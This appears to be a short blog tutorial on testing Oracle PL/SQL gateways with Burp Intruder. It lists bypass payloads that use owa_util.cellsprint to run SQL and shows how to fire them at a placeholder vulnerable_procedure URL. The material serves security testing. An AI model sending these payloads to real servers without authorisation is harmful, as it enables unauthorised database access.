The preset list contains:
owa_util.cellsprint?p_thequery=select+1+from+dual
%0Aowa_util.cellsprint?p_thequery=select+1+from+dual
S%FFS.owa_util.cellsprint?p_thequery=select+1+from+dual
*SYS*.owa_util.cellsprint?p_thequery=select+1+from+dual
<<"LBL">>
So create a notepad file containing this list. Send request for http://server.example.com/pls/dad/vulnerable_procedure into Intruder.
Navigate to Intruder > Positions and add position markers around vulnerable_procedure like so:
Navigate to > Payload Preset List and click 'load':
Open the oracle payload file:
Then start!
If you have a 403 response you know you won't be able to access this. Otherwise, game on.
Happy Hacking!
No comments:
Post a Comment